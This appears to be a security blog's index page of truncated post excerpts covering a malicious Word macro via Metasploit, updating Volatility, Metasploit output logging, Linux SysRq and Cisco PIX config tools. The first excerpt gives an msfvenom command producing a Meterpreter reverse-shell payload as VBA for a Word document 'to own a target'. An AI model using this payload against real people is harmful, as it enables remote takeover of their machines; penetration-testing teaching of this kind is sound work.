
So you want/need a malicious word document in order to own a target, step in metasploit.

The first thing you’ll need to do is create the code that you’ll copy&paste into your word document.

1./msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f vba > vbcode.txt

The output will contain 2 blocks of code; the macro and the data.

Open a new word document and Press Alt+F11 in order to open “Microsoft Visual… Continue reading

So for those that dont know volatility is a forensics tool for investigating data from memory. It can be found here:

Unfortunately BT5 was only on version 1.3 so I decided to update it to v2.0, the latest on the volatility website.

Here’s the quick code to update to version 2.0 🙂 Enjoy!

1234567891011121314151617181920#!/bin/bash apt-get -y install cmake cd /root/ wget tar zxvf libforensic1394-0.2.tar.gz cd libforensic1394-0.2/ cmake -G"Unix… Continue reading

I know how we all have our own way of copy/paste from console windows but metasploit has just introduced a new feature as of r13028.

You can now save all of the output of metasploit (including meterpreter) to a file using the spool command:

123spool /root/msf3_output.txt [OWNAGE GOES HERE] spool off

Or to ensure you always have a log of what you are doing add to the ~/.msf3/msfconsole.rc file… Continue reading

So your Linux box has locked up and you can’t get a response… step in SysRq!

This wonderful key is on most keyboards and i bet you’ve hit it a low more times than you realise as it’s usually paired up with the PrtSc (PrintScreen) key. What does it do?

Well it allows you to send system requests to a linux kernel, effectively allowing you to bypass the usual GUI/CLI… Continue reading

So, you’ve been given a cisco config from a pix firewall using

1'show run'

and you’ve looked through it and it seems a ballache to understand. We know we could use nipper but you either have to pay a wedge for the professional version of suffer with the free version.

After a little googling I found a few tools to help along the way. fwbuilder looks good but doesn’t… Continue reading